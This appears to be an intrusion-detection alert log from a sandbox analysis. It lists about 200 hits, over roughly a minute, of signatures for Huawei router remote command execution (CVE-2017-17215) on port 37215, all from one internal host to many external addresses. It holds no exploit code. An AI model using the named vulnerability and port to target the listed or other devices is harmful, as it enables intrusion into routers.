                                                        06/13/24-21:32:09.458174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589037215192.168.2.14197.152.101.240
                                                        06/13/24-21:32:52.676382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5843437215192.168.2.1441.150.25.214
                                                        06/13/24-21:33:04.992187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4962837215192.168.2.1441.54.249.130
                                                        06/13/24-21:32:15.631055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5491637215192.168.2.14197.91.85.206
                                                        06/13/24-21:32:01.222316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452637215192.168.2.1441.41.135.181
                                                        06/13/24-21:32:15.605278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322637215192.168.2.1441.105.87.107
                                                        06/13/24-21:32:15.636222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166837215192.168.2.1441.144.172.70
                                                        06/13/24-21:32:46.525735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181237215192.168.2.14156.127.65.133
                                                        06/13/24-21:32:01.246193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788637215192.168.2.1441.232.52.197
                                                        06/13/24-21:32:17.695071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4622837215192.168.2.14156.107.231.95
                                                        06/13/24-21:32:46.501879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6093237215192.168.2.1441.109.211.53
                                                        06/13/24-21:32:54.710737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998037215192.168.2.1441.53.247.59
                                                        06/13/24-21:32:30.075395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5087237215192.168.2.1441.253.72.166
                                                        06/13/24-21:32:46.501585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236237215192.168.2.14197.167.64.25
                                                        06/13/24-21:32:30.078946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4295437215192.168.2.1441.176.253.114
                                                        06/13/24-21:32:32.153028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052637215192.168.2.14156.109.196.19
                                                        06/13/24-21:32:17.696720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707037215192.168.2.14156.66.29.166
                                                        06/13/24-21:33:05.016797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741237215192.168.2.14156.90.28.33
                                                        06/13/24-21:32:13.568704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552637215192.168.2.1441.164.176.142
                                                        06/13/24-21:33:04.992367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629237215192.168.2.14197.5.46.154
                                                        06/13/24-21:33:13.230668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639237215192.168.2.14156.37.144.204
                                                        06/13/24-21:32:15.609492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6059437215192.168.2.14156.123.68.16
                                                        06/13/24-21:32:46.503392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044037215192.168.2.14156.143.107.186
                                                        06/13/24-21:33:15.256576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357437215192.168.2.14197.106.201.62
                                                        06/13/24-21:33:15.252373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024637215192.168.2.14197.243.196.12
                                                        06/13/24-21:32:56.754555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358437215192.168.2.14156.150.100.98
                                                        06/13/24-21:33:04.992459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545637215192.168.2.1441.171.28.17
                                                        06/13/24-21:32:13.568996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3384037215192.168.2.1441.238.200.197
                                                        06/13/24-21:33:02.937412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790237215192.168.2.14156.201.120.242
                                                        06/13/24-21:32:09.439249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626637215192.168.2.14197.40.43.83
                                                        06/13/24-21:32:30.125385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411437215192.168.2.14197.195.12.175
                                                        06/13/24-21:32:54.707785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229237215192.168.2.1441.51.76.222
                                                        06/13/24-21:32:23.940449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5747637215192.168.2.1441.190.24.102
                                                        06/13/24-21:32:50.633180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761437215192.168.2.1441.204.155.53
                                                        06/13/24-21:32:28.043563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562037215192.168.2.1441.175.191.178
                                                        06/13/24-21:32:30.095060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581837215192.168.2.14197.5.228.177
                                                        06/13/24-21:33:15.273305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298237215192.168.2.1441.252.137.48
                                                        06/13/24-21:32:30.127085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993037215192.168.2.14197.111.133.154
                                                        06/13/24-21:32:46.502901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850637215192.168.2.14197.203.11.122
                                                        06/13/24-21:33:09.088278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944237215192.168.2.14156.243.104.8
                                                        06/13/24-21:33:15.271127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5687837215192.168.2.14197.164.144.206
                                                        06/13/24-21:32:34.194632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158437215192.168.2.14156.236.231.166
                                                        06/13/24-21:32:34.214230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452837215192.168.2.14156.148.238.100
                                                        06/13/24-21:32:11.507931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941837215192.168.2.14197.172.6.147
                                                        06/13/24-21:33:02.909296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3745237215192.168.2.1441.148.170.49
                                                        06/13/24-21:32:13.543479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279037215192.168.2.1441.159.180.166
                                                        06/13/24-21:32:25.995735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252437215192.168.2.14156.6.180.192
                                                        06/13/24-21:32:30.128013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727637215192.168.2.14197.22.53.55
                                                        06/13/24-21:32:50.628825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721437215192.168.2.1441.223.182.111
                                                        06/13/24-21:32:38.321663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4757637215192.168.2.14156.132.247.129
                                                        06/13/24-21:32:56.783576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457437215192.168.2.14197.116.11.173
                                                        06/13/24-21:32:42.421767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625237215192.168.2.1441.49.136.178
                                                        06/13/24-21:32:34.212861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118037215192.168.2.1441.26.34.238
                                                        06/13/24-21:32:50.613040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517837215192.168.2.14156.211.16.160
                                                        06/13/24-21:33:09.130641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103237215192.168.2.1441.245.20.29
                                                        06/13/24-21:32:56.756479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586437215192.168.2.14197.33.151.23
                                                        06/13/24-21:32:03.300304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462237215192.168.2.1441.92.153.193
                                                        06/13/24-21:32:07.416805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4096037215192.168.2.1441.88.143.127
                                                        06/13/24-21:32:21.802391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5144437215192.168.2.1441.163.49.75
                                                        06/13/24-21:32:17.675510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966437215192.168.2.14197.47.120.228
                                                        06/13/24-21:32:38.301964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702037215192.168.2.1441.156.164.118
                                                        06/13/24-21:32:23.943912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869437215192.168.2.1441.196.234.235
                                                        06/13/24-21:33:17.305686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060037215192.168.2.1441.56.170.0
                                                        06/13/24-21:32:25.995897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605037215192.168.2.14197.207.195.187
                                                        06/13/24-21:32:07.404551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457637215192.168.2.14156.106.210.4
                                                        06/13/24-21:32:07.402151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612637215192.168.2.14197.148.45.91
                                                        06/13/24-21:32:38.303018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452637215192.168.2.14156.81.52.177
                                                        06/13/24-21:32:09.436534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331437215192.168.2.14197.122.60.70
                                                        06/13/24-21:33:09.109872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211437215192.168.2.14156.162.182.46
                                                        06/13/24-21:32:44.478174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882637215192.168.2.14156.22.151.21
                                                        06/13/24-21:32:21.804958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766637215192.168.2.14156.132.174.64
                                                        06/13/24-21:32:38.300838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980837215192.168.2.14197.251.120.20
                                                        06/13/24-21:32:52.659855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358037215192.168.2.1441.164.125.234
                                                        06/13/24-21:32:52.657854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945237215192.168.2.1441.149.241.63
                                                        06/13/24-21:31:57.137874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4412837215192.168.2.14197.9.190.76
                                                        06/13/24-21:32:44.454980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437837215192.168.2.1441.73.218.225
                                                        06/13/24-21:32:48.568941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356637215192.168.2.1441.227.233.210
                                                        06/13/24-21:33:00.887526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077237215192.168.2.14156.212.25.190
                                                        06/13/24-21:32:36.245846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6070237215192.168.2.14197.101.157.187
                                                        06/13/24-21:32:52.676157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775237215192.168.2.14156.118.116.112
                                                        06/13/24-21:32:30.078864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535437215192.168.2.1441.153.6.21
                                                        06/13/24-21:32:15.632543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798237215192.168.2.1441.10.213.224
                                                        06/13/24-21:33:17.308028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628037215192.168.2.14197.255.58.67
                                                        06/13/24-21:32:48.551498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052637215192.168.2.14156.197.163.178
                                                        06/13/24-21:32:54.708184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056237215192.168.2.14197.122.181.123
                                                        06/13/24-21:32:38.303115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5402437215192.168.2.14197.202.246.211
                                                        06/13/24-21:33:09.131299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332237215192.168.2.14156.20.119.138
                                                        06/13/24-21:32:11.485276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4601637215192.168.2.14197.194.73.113
                                                        06/13/24-21:32:30.094126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807637215192.168.2.14156.206.238.208
                                                        06/13/24-21:32:05.348313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918437215192.168.2.1441.216.170.26
                                                        06/13/24-21:32:32.166920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5178637215192.168.2.14156.150.67.135
                                                        06/13/24-21:33:05.013753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3384637215192.168.2.14156.110.19.23
                                                        06/13/24-21:33:17.305206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867637215192.168.2.14156.10.213.227
                                                        06/13/24-21:33:15.256289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5951037215192.168.2.14156.37.65.103
                                                        06/13/24-21:32:36.247650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3968037215192.168.2.14156.28.128.183
                                                        06/13/24-21:32:56.756418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3602837215192.168.2.14156.9.170.112
                                                        06/13/24-21:32:56.756316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503437215192.168.2.1441.30.12.126
                                                        06/13/24-21:32:28.044882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797237215192.168.2.14156.114.110.136
                                                        06/13/24-21:32:11.507230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590437215192.168.2.1441.215.251.70
                                                        06/13/24-21:33:09.086705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794237215192.168.2.1441.169.101.221
                                                        06/13/24-21:32:25.995157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814037215192.168.2.1441.156.228.156
                                                        06/13/24-21:32:07.403386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921637215192.168.2.14197.125.211.99
                                                        06/13/24-21:32:58.824220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784037215192.168.2.14156.245.199.134
                                                        06/13/24-21:32:50.631135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292437215192.168.2.14156.233.118.141
                                                        06/13/24-21:32:09.458696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532237215192.168.2.1441.2.171.203
                                                        06/13/24-21:32:40.359747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499237215192.168.2.14197.105.10.229
                                                        06/13/24-21:32:05.343845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351637215192.168.2.14197.215.140.204
                                                        06/13/24-21:33:00.868638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610037215192.168.2.14156.219.151.227
                                                        06/13/24-21:32:58.838949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916437215192.168.2.1441.149.64.22
                                                        06/13/24-21:32:19.728443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534837215192.168.2.14197.70.177.192
                                                        06/13/24-21:32:23.942624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793837215192.168.2.14197.196.194.177
                                                        06/13/24-21:32:25.972013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3519437215192.168.2.1441.164.53.127
                                                        06/13/24-21:33:17.308477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5337637215192.168.2.14197.192.207.30
                                                        06/13/24-21:33:09.129315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683637215192.168.2.14156.245.212.222
                                                        06/13/24-21:33:07.056917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570637215192.168.2.14156.199.94.108
                                                        06/13/24-21:32:32.170206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602837215192.168.2.14156.90.189.151
                                                        06/13/24-21:32:07.403194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459837215192.168.2.14156.107.165.231
                                                        06/13/24-21:32:15.633444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692037215192.168.2.14197.211.213.248
                                                        06/13/24-21:32:19.730554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423437215192.168.2.1441.4.135.57
                                                        06/13/24-21:32:36.245438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865637215192.168.2.14197.127.206.56
                                                        06/13/24-21:32:34.214348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624837215192.168.2.14156.183.54.92
                                                        06/13/24-21:33:05.014635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395837215192.168.2.14197.37.56.222
                                                        06/13/24-21:32:07.400596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118837215192.168.2.1441.204.17.84
                                                        06/13/24-21:31:59.196114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266237215192.168.2.14156.34.21.252
                                                        06/13/24-21:32:01.224495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975637215192.168.2.14156.38.225.89
                                                        06/13/24-21:32:13.544880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5340637215192.168.2.14197.202.185.200
                                                        06/13/24-21:32:21.805058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438637215192.168.2.14197.240.241.141
                                                        06/13/24-21:33:17.309404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578437215192.168.2.14197.163.182.61
                                                        06/13/24-21:32:13.565471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4480637215192.168.2.1441.41.182.49
                                                        06/13/24-21:32:32.165259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165837215192.168.2.14197.114.114.171
                                                        06/13/24-21:32:36.269479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584837215192.168.2.14156.205.159.0
                                                        06/13/24-21:32:13.546716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620237215192.168.2.14156.135.100.127
                                                        06/13/24-21:32:19.752631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4425437215192.168.2.14156.246.18.20
                                                        06/13/24-21:32:09.439514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117437215192.168.2.14156.92.79.135
                                                        06/13/24-21:32:52.670066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816037215192.168.2.14197.151.26.155
                                                        06/13/24-21:32:50.617702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987237215192.168.2.1441.215.249.15
                                                        06/13/24-21:33:15.257109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444237215192.168.2.1441.69.97.104
                                                        06/13/24-21:32:46.509705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056637215192.168.2.14197.31.118.121
                                                        06/13/24-21:33:07.039777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779437215192.168.2.14156.92.185.37
                                                        06/13/24-21:32:34.194670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954637215192.168.2.14197.203.42.34
                                                        06/13/24-21:33:13.231998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5950237215192.168.2.14156.67.23.163
                                                        06/13/24-21:32:54.708441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5996637215192.168.2.1441.4.48.213
                                                        06/13/24-21:31:57.133875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198637215192.168.2.1441.7.126.212
                                                        06/13/24-21:32:52.677408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207237215192.168.2.14156.64.155.13
                                                        06/13/24-21:32:15.603987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340237215192.168.2.14156.36.160.75
                                                        06/13/24-21:33:00.888555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334637215192.168.2.14156.233.109.119
                                                        06/13/24-21:32:25.977938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913237215192.168.2.1441.189.48.65
                                                        06/13/24-21:32:30.095227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662637215192.168.2.14197.199.83.113
                                                        06/13/24-21:32:34.191476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293837215192.168.2.1441.104.176.188
                                                        06/13/24-21:32:52.657703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328237215192.168.2.14156.238.111.88
                                                        06/13/24-21:32:40.355527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497437215192.168.2.14156.121.160.112
                                                        06/13/24-21:32:44.475796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354437215192.168.2.14156.27.249.91
                                                        06/13/24-21:32:07.402727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557437215192.168.2.14156.78.96.74
                                                        06/13/24-21:32:30.098010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5543637215192.168.2.14197.97.178.54
                                                        06/13/24-21:32:46.508153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4195637215192.168.2.14197.20.5.196
                                                        06/13/24-21:32:52.658787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993437215192.168.2.14197.219.251.1
                                                        06/13/24-21:32:48.573208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426037215192.168.2.14156.215.238.178
                                                        06/13/24-21:32:48.568730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965437215192.168.2.14197.214.210.232
                                                        06/13/24-21:32:01.221027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275637215192.168.2.14156.109.114.102
                                                        06/13/24-21:33:09.108616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688437215192.168.2.14156.147.51.28
                                                        06/13/24-21:32:15.635066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844637215192.168.2.14197.181.28.169
                                                        06/13/24-21:33:15.271923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690437215192.168.2.14156.5.163.146
                                                        06/13/24-21:32:52.679570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150437215192.168.2.14197.242.6.168
                                                        06/13/24-21:33:00.872646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810637215192.168.2.14197.148.185.123
                                                        06/13/24-21:33:11.175555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6075437215192.168.2.14156.144.26.65
                                                        06/13/24-21:31:59.195366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255237215192.168.2.14197.6.83.65
                                                        06/13/24-21:32:19.730881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728237215192.168.2.1441.116.106.66
                                                        06/13/24-21:32:56.758777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454037215192.168.2.14197.234.128.51
                                                        06/13/24-21:31:57.132009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3684037215192.168.2.1441.109.66.1
                                                        06/13/24-21:32:25.973996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007637215192.168.2.14156.132.135.182
                                                        06/13/24-21:32:34.213540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897037215192.168.2.1441.181.252.134
                                                        06/13/24-21:32:44.475642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677837215192.168.2.1441.106.85.116
                                                        06/13/24-21:33:09.110876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323437215192.168.2.1441.57.1.179
                                                        06/13/24-21:32:03.301285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726237215192.168.2.14156.20.198.100
                                                        06/13/24-21:32:21.782146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5288037215192.168.2.14156.243.145.182
                                                        06/13/24-21:32:34.199650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267837215192.168.2.1441.140.200.51
                                                        06/13/24-21:33:13.212403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975437215192.168.2.14156.246.134.32
                                                        06/13/24-21:32:19.727629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052037215192.168.2.1441.54.231.236
                                                        06/13/24-21:32:42.405600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383237215192.168.2.14156.217.143.137
                                                        06/13/24-21:32:09.437684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5692237215192.168.2.14197.106.166.63
                                                        06/13/24-21:32:38.322862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714837215192.168.2.14156.178.10.138
                                                        06/13/24-21:32:40.354377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478037215192.168.2.14197.52.46.31
                                                        06/13/24-21:33:11.157200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848237215192.168.2.14156.40.8.25
                                                        06/13/24-21:32:01.241061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973437215192.168.2.14156.21.137.149
                                                        06/13/24-21:32:38.300575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583837215192.168.2.1441.179.118.247
                                                        06/13/24-21:33:13.230933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3319037215192.168.2.14197.175.227.60
                                                        06/13/24-21:32:42.406352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205637215192.168.2.14197.158.113.222
